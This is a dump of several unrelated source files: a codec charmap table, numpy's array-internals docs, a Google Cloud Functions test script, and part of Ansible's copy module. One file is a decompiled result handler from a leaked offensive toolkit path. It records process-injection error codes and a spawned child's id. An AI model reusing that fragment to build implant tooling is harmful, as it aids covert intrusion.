u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\u012b' # 0xB4 -> LATIN SMALL LETTER I WITH MACRON
u'\u0136' # 0xB5 -> LATIN CAPITAL LETTER K WITH CEDILLA
u'\u2202' # 0xB6 -> PARTIAL DIFFERENTIAL
u'\u2211' # 0xB7 -> N-ARY SUMMATION
u'\u0142' # 0xB8 -> LATIN SMALL LETTER L WITH STROKE
u'\u013b' # 0xB9 -> LATIN CAPITAL LETTER L WITH CEDILLA
u'\u013c' # 0xBA -> LATIN SMALL LETTER L WITH CEDILLA
u'\u013d' # 0xBB -> LATIN CAPITAL LETTER L WITH CARON
u'\u013e' # 0xBC -> LATIN SMALL LETTER L WITH CARON
u'\u0139' # 0xBD -> LATIN CAPITAL LETTER L WITH ACUTE
u'\u013a' # 0xBE -> LATIN SMALL LETTER L WITH ACUTE
u'\u0145' # 0xBF -> LATIN CAPITAL LETTER N WITH CEDILLA
u'\u0146' # 0xC0 -> LATIN SMALL LETTER N WITH CEDILLA
u'\u0143' # 0xC1 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0144' # 0xC4 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0147' # 0xC5 -> LATIN CAPITAL LETTER N WITH CARON
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\u0148' # 0xCB -> LATIN SMALL LETTER N WITH CARON
u'\u0150' # 0xCC -> LATIN CAPITAL LETTER O WITH DOUBLE ACUTE
u'\xd5' # 0xCD -> LATIN CAPITAL LETTER O WITH TILDE
u'\u0151' # 0xCE -> LATIN SMALL LETTER O WITH DOUBLE ACUTE
u'\u014c' # 0xCF -> LATIN CAPITAL LETTER O WITH MACRON
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u25ca' # 0xD7 -> LOZENGE
u'\u014d' # 0xD8 -> LATIN SMALL LETTER O WITH MACRON
u'\u0154' # 0xD9 -> LATIN CAPITAL LETTER R WITH ACUTE
u'\u0155' # 0xDA -> LATIN SMALL LETTER R WITH ACUTE
u'\u0158' # 0xDB -> LATIN CAPITAL LETTER R WITH CARON
u'\u2039' # 0xDC -> SINGLE LEFT-POINTING ANGLE QUOTATION MARK
u'\u203a' # 0xDD -> SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
u'\u0159' # 0xDE -> LATIN SMALL LETTER R WITH CARON
u'\u0156' # 0xDF -> LATIN CAPITAL LETTER R WITH CEDILLA
u'\u0157' # 0xE0 -> LATIN SMALL LETTER R WITH CEDILLA
u'\u0160' # 0xE1 -> LATIN CAPITAL LETTER S WITH CARON
u'\u201a' # 0xE2 -> SINGLE LOW-9 QUOTATION MARK
u'\u201e' # 0xE3 -> DOUBLE LOW-9 QUOTATION MARK
u'\u0161' # 0xE4 -> LATIN SMALL LETTER S WITH CARON
u'\u015a' # 0xE5 -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u015b' # 0xE6 -> LATIN SMALL LETTER S WITH ACUTE
u'\xc1' # 0xE7 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\u0164' # 0xE8 -> LATIN CAPITAL LETTER T WITH CARON
u'\u0165' # 0xE9 -> LATIN SMALL LETTER T WITH CARON
u'\xcd' # 0xEA -> LATIN CAPITAL LETTER I WITH ACUTE
u'\u017d' # 0xEB -> LATIN CAPITAL LETTER Z WITH CARON
u'\u017e' # 0xEC -> LATIN SMALL LETTER Z WITH CARON
u'\u016a' # 0xED -> LATIN CAPITAL LETTER U WITH MACRON
u'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xEF -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\u016b' # 0xF0 -> LATIN SMALL LETTER U WITH MACRON
u'\u016e' # 0xF1 -> LATIN CAPITAL LETTER U WITH RING ABOVE
u'\xda' # 0xF2 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\u016f' # 0xF3 -> LATIN SMALL LETTER U WITH RING ABOVE
u'\u0170' # 0xF4 -> LATIN CAPITAL LETTER U WITH DOUBLE ACUTE
u'\u0171' # 0xF5 -> LATIN SMALL LETTER U WITH DOUBLE ACUTE
u'\u0172' # 0xF6 -> LATIN CAPITAL LETTER U WITH OGONEK
u'\u0173' # 0xF7 -> LATIN SMALL LETTER U WITH OGONEK
u'\xdd' # 0xF8 -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\xfd' # 0xF9 -> LATIN SMALL LETTER Y WITH ACUTE
u'\u0137' # 0xFA -> LATIN SMALL LETTER K WITH CEDILLA
u'\u017b' # 0xFB -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\u0141' # 0xFC -> LATIN CAPITAL LETTER L WITH STROKE
u'\u017c' # 0xFD -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u0122' # 0xFE -> LATIN CAPITAL LETTER G WITH CEDILLA
u'\u02c7' # 0xFF -> CARON
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| mit |
saquiba2/numpytry | numpy/doc/internals.py | 163 | 9673 | """
===============
Array Internals
===============
Internal organization of numpy arrays
=====================================
It helps to understand a bit about how numpy arrays are handled under the covers to help understand numpy better. This section will not go into great detail. Those wishing to understand the full details are referred to Travis Oliphant's book "Guide to Numpy".
Numpy arrays consist of two major components, the raw array data (from now on,
referred to as the data buffer), and the information about the raw array data.
The data buffer is typically what people think of as arrays in C or Fortran,
a contiguous (and fixed) block of memory containing fixed sized data items.
Numpy also contains a significant set of data that describes how to interpret
the data in the data buffer. This extra information contains (among other things):
1) The basic data element's size in bytes
2) The start of the data within the data buffer (an offset relative to the
beginning of the data buffer).
3) The number of dimensions and the size of each dimension
4) The separation between elements for each dimension (the 'stride'). This
does not have to be a multiple of the element size
5) The byte order of the data (which may not be the native byte order)
6) Whether the buffer is read-only
7) Information (via the dtype object) about the interpretation of the basic
data element. The basic data element may be as simple as a int or a float,
or it may be a compound object (e.g., struct-like), a fixed character field,
or Python object pointers.
8) Whether the array is to interpreted as C-order or Fortran-order.
This arrangement allow for very flexible use of arrays. One thing that it allows
is simple changes of the metadata to change the interpretation of the array buffer.
Changing the byteorder of the array is a simple change involving no rearrangement
of the data. The shape of the array can be changed very easily without changing
anything in the data buffer or any data copying at all
Among other things, this makes it possible to create a new array metadata
object that uses the same data buffer
to create a new view of that data buffer that has a different interpretation
of the buffer (e.g., different shape, offset, byte order, strides, etc) but
shares the same data bytes. Many operations in numpy do just this such as
slices. Other operations, such as transpose, don't move data elements
around in the array, but rather change the information about the shape and strides so that the indexing of the array changes, but the data in the buffer doesn't move.
Typically these new versions of the array metadata, sharing the same data buffer, are
new 'views' into the data buffer. There is a different ndarray object, but it
uses the same data buffer. This is why it is necessary to force copies through
use of the .copy() method if one really wants to make a new and independent
copy of the data buffer.
New views into arrays mean that the object reference counts for the data buffer
increase. Simply doing away with the original array object will not remove the
data buffer if other views of it still exist.
Multidimensional Array Indexing Order Issues
============================================
What is the right way to index
multi-dimensional arrays? Before you jump to conclusions about the one and
true way to index multi-dimensional arrays, it pays to understand why this is
a confusing issue. This section will try to explain in detail how numpy
indexing works and why we adopt the convention we do for images, and when it
may be appropriate to adopt other conventions.
The first thing to understand is
that there are two conflicting conventions for indexing 2-dimensional arrays.
Matrix notation uses the first index to indicate which row is being selected and
the second index to indicate which column is selected. This is opposite the
geometrically oriented-convention for images where people generally think the
first index represents x position (i.e., column) and the second represents y
position (i.e., row). This alone is the source of much confusion;
matrix-oriented users and image-oriented users expect two different things with
regard to indexing.
The second issue to understand is how indices correspond
to the order the array is stored in memory. In Fortran the first index is the
most rapidly varying index when moving through the elements of a two
dimensional array as it is stored in memory. If you adopt the matrix
convention for indexing, then this means the matrix is stored one column at a
time (since the first index moves to the next row as it changes). Thus Fortran
is considered a Column-major language. C has just the opposite convention. In
C, the last index changes most rapidly as one moves through the array as
stored in memory. Thus C is a Row-major language. The matrix is stored by
rows. Note that in both cases it presumes that the matrix convention for
indexing is being used, i.e., for both Fortran and C, the first index is the
row. Note this convention implies that the indexing convention is invariant
and that the data order changes to keep that so.
But that's not the only way
to look at it. Suppose one has large two-dimensional arrays (images or
matrices) stored in data files. Suppose the data are stored by rows rather than
by columns. If we are to preserve our index convention (whether matrix or
image) that means that depending on the language we use, we may be forced to
reorder the data if it is read into memory to preserve our indexing
convention. For example if we read row-ordered data into memory without
reordering, it will match the matrix indexing convention for C, but not for
Fortran. Conversely, it will match the image indexing convention for Fortran,
but not for C. For C, if one is using data stored in row order, and one wants
to preserve the image index convention, the data must be reordered when
reading into memory.
In the end, which you do for Fortran or C depends on
which is more important, not reordering data or preserving the indexing
convention. For large images, reordering data is potentially expensive, and
often the indexing convention is inverted to avoid that.
The situation with
numpy makes this issue yet more complicated. The internal machinery of numpy
arrays is flexible enough to accept any ordering of indices. One can simply
reorder indices by manipulating the internal stride information for arrays
without reordering the data at all. Numpy will know how to map the new index
order to the data without moving the data.
So if this is true, why not choose
the index order that matches what you most expect? In particular, why not define
row-ordered images to use the image convention? (This is sometimes referred
to as the Fortran convention vs the C convention, thus the 'C' and 'FORTRAN'
order options for array ordering in numpy.) The drawback of doing this is
potential performance penalties. It's common to access the data sequentially,
either implicitly in array operations or explicitly by looping over rows of an
image. When that is done, then the data will be accessed in non-optimal order.
As the first index is incremented, what is actually happening is that elements
spaced far apart in memory are being sequentially accessed, with usually poor
memory access speeds. For example, for a two dimensional image 'im' defined so
that im[0, 10] represents the value at x=0, y=10. To be consistent with usual
Python behavior then im[0] would represent a column at x=0. Yet that data
would be spread over the whole array since the data are stored in row order.
Despite the flexibility of numpy's indexing, it can't really paper over the fact
basic operations are rendered inefficient because of data order or that getting
contiguous subarrays is still awkward (e.g., im[:,0] for the first row, vs
im[0]). Thus one can't use a simple idiom such as "for row in im";
"for col in im" does work, but doesn't yield contiguous column data.
As it turns out, numpy is
smart enough when dealing with ufuncs to determine which index is the most
rapidly varying one in memory and uses that for the innermost loop. Thus for
ufuncs there is no large intrinsic advantage to either approach in most cases.
On the other hand, use of .flat with a FORTRAN ordered array will lead to
non-optimal memory access as adjacent elements in the flattened array (iterator,
actually) are not contiguous in memory.
Indeed, the fact is that Python
indexing on lists and other sequences naturally leads to an outside-to inside
ordering (the first index gets the largest grouping, the next the next largest,
and the last gets the smallest element). Since image data are normally stored
by rows, this corresponds to position within rows being the last item indexed.
If you do want to use Fortran ordering realize that
there are two approaches to consider: 1) accept that the first index is just not
the most rapidly changing in memory and have all your I/O routines reorder
your data when going from memory to disk or vice versa, or 2) use numpy's
mechanism for mapping the first index to the most rapidly varying data. We
recommend the former if possible. The disadvantage of the latter is that many
of numpy's functions will yield arrays without Fortran ordering unless you are
careful to use the 'order' keyword. Doing this would be highly inconvenient.
Otherwise we recommend simply learning to reverse the usual order of indices
when accessing elements of an array. Granted, it goes against the grain, but
it is more in line with Python semantics and the natural order of the data.
"""
from __future__ import division, absolute_import, print_function
| bsd-3-clause |
googleapis/api-client-staging | test/python/functions/functions.py | 7 | 2790 | from google.cloud.functions.v1beta2 import cloud_functions_service_client
from google.cloud.proto.functions.v1beta2 import functions_pb2
from google.gax.errors import GaxError
from grpc import StatusCode
# Point this at your project ID.
PROJECT_ID = 'gapic-test'
# Region and short name used to build the fully-qualified function path below.
LOCATION_ID = 'us-central1'
FUNCTION_ID = 'helloWorld'
# upload helloWorld.zip from this directory to Google Storage for your project
SOURCE_URI = 'gs://gapic-functions-v1beta2/helloWorld.zip'
# Shared client instance and the resource paths used throughout this script.
api = cloud_functions_service_client.CloudFunctionsServiceClient()
location = api.location_path(PROJECT_ID, LOCATION_ID)
function_name = api.function_path(PROJECT_ID, LOCATION_ID, FUNCTION_ID)
def on_delete(operation_future):
    """Completion callback for the final delete operation.

    Confirms the function is gone by fetching it and expecting a
    NOT_FOUND error; any other outcome is re-raised.
    """
    try:
        api.get_function(function_name)
    except GaxError as err:
        status = getattr(err.cause, "code", None)
        if not (callable(status) and status() == StatusCode.NOT_FOUND):
            raise
        print('Expect error here since the function should have been deleted')
def on_update(operation_future):
    """Completion callback for the update operation.

    Fetches the updated function, invokes it with a sample payload,
    lists all functions in the location, then starts deletion and
    chains to on_delete.
    """
    updated = operation_future.result()
    print('Function updated: \n%s\n' % updated)

    fetched = api.get_function(updated.name)
    print('Function fetched: \n%s\n' % fetched)

    payload = '{"message":"Hello World!"}'
    response = api.call_function(fetched.name, payload)
    print('Function call response: \n%s\n' % response)

    print('List functions:\n')
    for entry in api.list_functions(location):
        print(entry)

    print('Delete function:\n')
    deletion = api.delete_function(function_name)
    deletion.add_done_callback(on_delete)
    print('Metadata: \n%s\n' % deletion.metadata())
def on_create(operation_future):
    """Completion callback for the create operation.

    Rewrites the new function to use a second pub/sub trigger topic and
    chains to on_update once the update operation completes.
    """
    created = operation_future.result()
    print('Function created: \n%s\n' % created)

    replacement = functions_pb2.CloudFunction(
        name=created.name,
        source_archive_url=created.source_archive_url,
        pubsub_trigger=('projects/%s/topics/hello_world2' % PROJECT_ID))
    update_op = api.update_function(created.name, replacement)
    update_op.add_done_callback(on_update)
    print('Metadata: \n%s\n' % update_op.metadata())
def on_init(_):
    """Create the sample function and chain to on_create when done.

    The argument (a completed operation future, or None) is ignored.
    """
    spec = functions_pb2.CloudFunction(
        name=function_name,
        source_archive_url=SOURCE_URI,
        pubsub_trigger=('projects/%s/topics/hello_world' % PROJECT_ID))
    create_op = api.create_function(location, spec)
    create_op.add_done_callback(on_create)
    print('Metadata: \n%s\n' % create_op.metadata())
# Entry point of the demo chain: delete any function left over from a
# previous run and start from on_init once the deletion completes.  If no
# such function exists, the delete call fails with NOT_FOUND and we start
# the chain immediately; any other error is re-raised.
try:
    response = api.delete_function(function_name)
    response.add_done_callback(on_init)
except GaxError as e:
    code = getattr(e.cause, "code", None)
    if callable(code) and code() == StatusCode.NOT_FOUND:
        on_init(None)
    else:
        raise
| bsd-3-clause |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/DataHandlers/Mcl_Cmd_RunAsChild_DataHandler.py | 1 | 2075 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: Mcl_Cmd_RunAsChild_DataHandler.py
def DataHandlerMain(namespace, InputFilename, OutputFilename):
    """Post-process the marshalled result of a 'runaschild' task.

    Reads marshalled task data from InputFilename, records either the
    module/OS error codes (failure) or the spawned child's process id as
    XML (success), and writes everything to OutputFilename.

    Returns True on completion for both the success and the error path.
    """
    # Imports are deferred to call time; the mcl package layout is
    # presumably only available once the caller has set up the
    # environment for this handler.
    import mcl.imports
    import mcl.data.Input
    import mcl.data.Output
    import mcl.status
    import mcl.target
    import mcl.object.Message
    # Injects names from the 'mca.process.cmd.runaschild' namespace into
    # globals() — this is where Result, errorStrings,
    # ERR_INJECT_SETUP_FAILED and ERR_INJECT_FAILED (used below) come from.
    mcl.imports.ImportNamesWithNamespace(namespace, 'mca.process.cmd.runaschild', globals())
    input = mcl.data.Input.GetInput(InputFilename)
    output = mcl.data.Output.StartOutput(OutputFilename, input)
    output.Start('RunAsChild', 'runaschild', [])
    msg = mcl.object.Message.DemarshalMessage(input.GetData())
    if input.GetStatus() != mcl.status.MCL_SUCCESS:
        # Failure path: unpack the module-specific and OS error codes
        # from the result message.
        errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
        moduleError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
        osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
        if moduleError == ERR_INJECT_SETUP_FAILED or moduleError == ERR_INJECT_FAILED:
            # Injection failures: the OS error is described by the
            # injection error table, so record the two codes separately.
            import mcl.injection.errors
            output.RecordModuleError(moduleError, 0, errorStrings)
            output.RecordModuleError(osError, 0, mcl.injection.errors.errorStrings)
        else:
            output.RecordModuleError(moduleError, osError, errorStrings)
        output.EndWithStatus(input.GetStatus())
        return True
    results = Result()
    results.Demarshal(msg)
    # Success path: emit the child's process id as an XML record.
    from mcl.object.XmlOutput import XmlOutput
    xml = XmlOutput()
    xml.Start('Process')
    xml.AddAttribute('id', '%u' % results.id)
    output.RecordXml(xml)
    output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
    return True
if __name__ == '__main__':
import sys
try:
namespace, InputFilename, OutputFilename = sys.argv[1:]
except:
print '%s <namespace> <input filename> <output filename>' % sys.argv[0]
sys.exit(1)
if DataHandlerMain(namespace, InputFilename, OutputFilename) != True:
sys.exit(-1) | unlicense |
mgit-at/ansible | lib/ansible/modules/files/copy.py | 17 | 29399 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: copy
version_added: "historical"
short_description: Copies files to remote locations
description:
- The C(copy) module copies a file from the local or remote machine to a location on the remote machine.
Use the M(fetch) module to copy files from remote locations to the local box.
If you need variable interpolation in copied files, use the M(template) module.
- For Windows targets, use the M(win_copy) module instead.
options:
src:
description:
- Local path to a file to copy to the remote server; can be absolute or relative.
If path is a directory, it is copied recursively. In this case, if path ends
with "/", only inside contents of that directory are copied to destination.
Otherwise, if it does not end with "/", the directory itself with all contents
is copied. This behavior is similar to Rsync.
content:
description:
- When used instead of I(src), sets the contents of a file directly to the specified value.
For anything advanced or with formatting also look at the template module.
version_added: "1.1"
dest:
description:
- 'Remote absolute path where the file should be copied to. If I(src) is a directory, this must be a directory too.
If I(dest) is a nonexistent path and if either I(dest) ends with "/" or I(src) is a directory, I(dest) is created.
If I(src) and I(dest) are files, the parent directory of I(dest) isn''t created: the task fails if it doesn''t already exist.'
required: yes
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
type: bool
default: 'no'
version_added: "0.7"
force:
description:
- the default is C(yes), which will replace the remote file when contents
are different than the source. If C(no), the file will only be transferred
if the destination does not exist.
type: bool
default: 'yes'
aliases: [ thirsty ]
version_added: "1.1"
mode:
description:
- "Mode the file or directory should be. For those used to I(/usr/bin/chmod) remember that
modes are actually octal numbers. You must either add a leading zero so that Ansible's
YAML parser knows it is an octal number (like C(0644) or C(01777)) or quote it
(like C('644') or C('1777')) so Ansible receives a string and can do its own conversion from
string into number. Giving Ansible a number without following one of these rules will end
up with a decimal number which will have unexpected results. As of version 1.8, the mode
may be specified as a symbolic mode (for example, C(u+rwx) or C(u=rw,g=r,o=r)). As of
version 2.3, the mode may also be the special string C(preserve). C(preserve) means that
the file will be given the same permissions as the source file."
directory_mode:
description:
- When doing a recursive copy set the mode for the directories. If this is not set we will use the system
defaults. The mode is only set on directories which are newly created, and will not affect those that
already existed.
version_added: "1.5"
remote_src:
description:
- If C(no), it will search for I(src) at originating/master machine.
- If C(yes) it will go to the remote/target machine for the I(src). Default is C(no).
- I(remote_src) supports recursive copying as of version 2.8.
- I(remote_src) only works with C(mode=preserve) as of version 2.6.
type: bool
default: 'no'
version_added: "2.0"
follow:
description:
- This flag indicates that filesystem links in the destination, if they exist, should be followed.
type: bool
default: 'no'
version_added: "1.8"
local_follow:
description:
- This flag indicates that filesystem links in the source tree, if they exist, should be followed.
type: bool
default: 'yes'
version_added: "2.4"
checksum:
description:
- SHA1 checksum of the file being transferred. Used to validate that the copy of the file was successful.
- If this is not provided, ansible will use the local calculated checksum of the src file.
version_added: '2.5'
extends_documentation_fragment:
- files
- validate
- decrypt
author:
- Ansible Core Team
- Michael DeHaan
notes:
- The M(copy) module recursively copy facility does not scale to lots (>hundreds) of files.
For alternative, see M(synchronize) module, which is a wrapper around C(rsync).
- For Windows targets, use the M(win_copy) module instead.
'''
EXAMPLES = r'''
- name: example copying file with owner and permissions
copy:
src: /srv/myfiles/foo.conf
dest: /etc/foo.conf
owner: foo
group: foo
mode: 0644
- name: The same example as above, but using a symbolic mode equivalent to 0644
copy:
src: /srv/myfiles/foo.conf
dest: /etc/foo.conf
owner: foo
group: foo
mode: u=rw,g=r,o=r
- name: Another symbolic mode example, adding some permissions and removing others
copy:
src: /srv/myfiles/foo.conf
dest: /etc/foo.conf
owner: foo
group: foo
mode: u+rw,g-wx,o-rwx
- name: Copy a new "ntp.conf" file into place, backing up the original if it differs from the copied version
copy:
src: /mine/ntp.conf
dest: /etc/ntp.conf
owner: root
group: root
mode: 0644
backup: yes
- name: Copy a new "sudoers" file into place, after passing validation with visudo
copy:
src: /mine/sudoers
dest: /etc/sudoers
validate: /usr/sbin/visudo -cf %s
- name: Copy a "sudoers" file on the remote machine for editing
copy:
src: /etc/sudoers
dest: /etc/sudoers.edit
remote_src: yes
validate: /usr/sbin/visudo -cf %s
- name: Copy using the 'content' for inline data
copy:
content: '# This file was moved to /etc/other.conf'
dest: /etc/mine.conf
- name: if follow is true, /path/to/file will be overwritten by contents of foo.conf
copy:
src: /etc/foo.conf
dest: /path/to/link # /path/to/link is link to /path/to/file
follow: True
- name: if follow is False, /path/to/link will become a file and be overwritten by contents of foo.conf
copy:
src: /etc/foo.conf
dest: /path/to/link # /path/to/link is link to /path/to/file
follow: False
'''
RETURN = r'''
dest:
description: destination file/path
returned: success
type: string
sample: /path/to/file.txt
src:
description: source file used for the copy on the target machine
returned: changed
type: string
sample: /home/httpd/.ansible/tmp/ansible-tmp-1423796390.97-147729857856000/source
md5sum:
description: md5 checksum of the file after running copy
returned: when supported
type: string
sample: 2a5aeecc61dc98c4d780b14b330e3282
checksum:
description: sha1 checksum of the file after running copy
returned: success
type: string
sample: 6e642bb8dd5c2e027bf21dd923337cbb4214f827
backup_file:
description: name of backup file created
returned: changed and if backup=yes
type: string
sample: /path/to/file.txt.2015-02-12@22:09~
gid:
description: group id of the file, after execution
returned: success
type: int
sample: 100
group:
description: group of the file, after execution
returned: success
type: string
sample: httpd
owner:
description: owner of the file, after execution
returned: success
type: string
sample: httpd
uid:
description: owner id of the file, after execution
returned: success
type: int
sample: 100
mode:
description: permissions of the target, after execution
returned: success
type: string
sample: 0644
size:
description: size of the target, after execution
returned: success
type: int
sample: 1220
state:
description: state of the target, after execution
returned: success
type: string
sample: file
'''
import os
import os.path
import shutil
import filecmp
import pwd
import grp
import stat
import errno
import tempfile
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes, to_native
class AnsibleModuleError(Exception):
    """Error carrying a fail_json-compatible results dict up to main().

    The ``results`` mapping (typically containing a 'msg' key) is passed
    straight to ``module.fail_json(**e.results)`` by the caller.
    """

    def __init__(self, results):
        # Also pass results to Exception so str()/args and tracebacks show
        # the failure details instead of an empty message.
        super(AnsibleModuleError, self).__init__(results)
        self.results = results

    def __repr__(self):
        # Useful when the exception escapes uncaught or is logged.
        return 'AnsibleModuleError(results={0})'.format(self.results)
def split_pre_existing_dir(dirname):
    '''
    Return the deepest directory of dirname that already exists, together
    with the ordered list of path components that still need to be created
    beneath it.  Raises AnsibleModuleError if even '/' is missing.
    '''
    head, tail = os.path.split(dirname)
    if head == '':
        # No directory component left: everything hangs off the cwd.
        return ('.', [tail])
    b_head = to_bytes(head, errors='surrogate_or_strict')
    if os.path.exists(b_head):
        return (head, [tail])
    if head == '/':
        raise AnsibleModuleError(results={'msg': "The '/' directory doesn't exist on this machine."})
    # Recurse toward the filesystem root, then append our component.
    pre_existing_dir, new_directory_list = split_pre_existing_dir(head)
    new_directory_list.append(tail)
    return (pre_existing_dir, new_directory_list)
def adjust_recursive_directory_permissions(pre_existing_dir, new_directory_list, module, directory_args, changed):
    '''
    Walk the list of newly created directory components under
    pre_existing_dir and apply the requested filesystem attributes to each
    one.  new_directory_list is consumed (emptied) as a side effect, and
    directory_args['path'] is updated for every component visited.
    Returns the accumulated 'changed' flag.
    '''
    working_dir = pre_existing_dir
    while new_directory_list:
        working_dir = os.path.join(working_dir, new_directory_list.pop(0))
        directory_args['path'] = working_dir
        changed = module.set_fs_attributes_if_different(directory_args, changed)
    return changed
def chown_recursive(path, module):
    """Apply the requested owner and/or group to everything under path.

    In normal mode ownership is changed through the module helpers; in
    check mode the tree is only inspected via stat() to decide whether a
    change would be needed (the owner/group names must resolve via
    pwd/grp in that case).  Returns True if any ownership was changed or
    would need changing.
    """
    def _all_entries(root):
        # Yield every path under root: each directory first, then its
        # immediate subdirectories and files.
        for dirpath, dirnames, filenames in os.walk(root):
            yield dirpath
            for name in dirnames:
                yield os.path.join(dirpath, name)
            for name in filenames:
                yield os.path.join(dirpath, name)

    changed = False
    owner = module.params['owner']
    group = module.params['group']

    if owner is not None:
        if not module.check_mode:
            for entry in _all_entries(path):
                if module.set_owner_if_different(entry, owner, False) is True:
                    changed = True
        else:
            uid = pwd.getpwnam(owner).pw_uid
            for entry in _all_entries(path):
                if os.stat(entry).st_uid != uid:
                    changed = True

    if group is not None:
        if not module.check_mode:
            for entry in _all_entries(path):
                if module.set_group_if_different(entry, group, False) is True:
                    changed = True
        else:
            gid = grp.getgrnam(group).gr_gid
            for entry in _all_entries(path):
                if os.stat(entry).st_gid != gid:
                    changed = True

    return changed
def copy_diff_files(src, dest, module):
    """Copy files present in both trees whose contents differ.

    Files reported by filecmp.dircmp as differing are copied from src to
    dest (or recreated as symlinks when local_follow is disabled), and any
    requested owner/group is applied.  In check mode nothing is copied;
    the return value only reports whether anything differs.

    Returns True if any file differed.
    """
    owner = module.params['owner']
    group = module.params['group']
    local_follow = module.params['local_follow']
    differing = filecmp.dircmp(src, dest).diff_files
    changed = bool(differing)
    if module.check_mode:
        return changed
    for name in differing:
        b_src_file = to_bytes(os.path.join(src, name), errors='surrogate_or_strict')
        b_dest_file = to_bytes(os.path.join(dest, name), errors='surrogate_or_strict')
        if os.path.islink(b_src_file) and local_follow is False:
            # Preserve the symlink itself instead of following it.
            os.symlink(os.readlink(b_src_file), b_dest_file)
        else:
            shutil.copyfile(b_src_file, b_dest_file)
        if owner is not None:
            module.set_owner_if_different(b_dest_file, owner, False)
        if group is not None:
            module.set_group_if_different(b_dest_file, group, False)
        changed = True
    return changed
def copy_left_only(src, dest, module):
    """Copy entries that exist only under src into dest.

    Per entry, six mutually exclusive cases are handled: symlinked
    directories and symlinked files (either followed or preserved as
    links, depending on local_follow), plus regular files and regular
    directories.  Ownership is applied to copied files and, recursively,
    to copied trees.  In check mode nothing is copied; the return value
    only reports whether dest is missing anything.

    Returns True if src contained any entry that dest lacked.
    """
    owner = module.params['owner']
    group = module.params['group']
    local_follow = module.params['local_follow']
    left_only = filecmp.dircmp(src, dest).left_only
    changed = bool(left_only)
    if module.check_mode:
        return changed
    for name in left_only:
        b_src_entry = to_bytes(os.path.join(src, name), errors='surrogate_or_strict')
        b_dest_entry = to_bytes(os.path.join(dest, name), errors='surrogate_or_strict')
        # islink/isdir/isfile describe the source entry (isdir/isfile
        # follow the link target, so they are disjoint for one entry).
        is_link = os.path.islink(b_src_entry)
        is_dir = os.path.isdir(b_src_entry)
        is_file = os.path.isfile(b_src_entry)

        if is_link and is_dir and local_follow is True:
            # Follow the link and copy the whole tree it points at.
            shutil.copytree(b_src_entry, b_dest_entry, symlinks=not(local_follow))
            chown_recursive(b_dest_entry, module)
        elif is_link and is_dir and local_follow is False:
            # Preserve the directory symlink itself.
            os.symlink(os.readlink(b_src_entry), b_dest_entry)
        elif is_link and is_file and local_follow is True:
            # Follow the link and copy the file it points at.
            shutil.copyfile(b_src_entry, b_dest_entry)
            if owner is not None:
                module.set_owner_if_different(b_dest_entry, owner, False)
            if group is not None:
                module.set_group_if_different(b_dest_entry, group, False)
        elif is_link and is_file and local_follow is False:
            # Preserve the file symlink itself.
            os.symlink(os.readlink(b_src_entry), b_dest_entry)
        elif not is_link and is_file:
            shutil.copyfile(b_src_entry, b_dest_entry)
            if owner is not None:
                module.set_owner_if_different(b_dest_entry, owner, False)
            if group is not None:
                module.set_group_if_different(b_dest_entry, group, False)
        elif not is_link and is_dir:
            shutil.copytree(b_src_entry, b_dest_entry, symlinks=not(local_follow))
            chown_recursive(b_dest_entry, module)
    return changed
def copy_common_dirs(src, dest, module):
    """Recursively synchronise directories present in both src and dest.

    For every directory name common to src and dest, copy files whose
    contents differ and entries that exist only in src, then recurse into
    that subdirectory so deeper levels are synchronised too.

    Returns True if anything was (or, in check mode, would be) changed.
    """
    changed = False
    common_dirs = filecmp.dircmp(src, dest).common_dirs
    for item in common_dirs:
        src_item_path = os.path.join(src, item)
        dest_item_path = os.path.join(dest, item)
        b_src_item_path = to_bytes(src_item_path, errors='surrogate_or_strict')
        b_dest_item_path = to_bytes(dest_item_path, errors='surrogate_or_strict')
        diff_files_changed = copy_diff_files(b_src_item_path, b_dest_item_path, module)
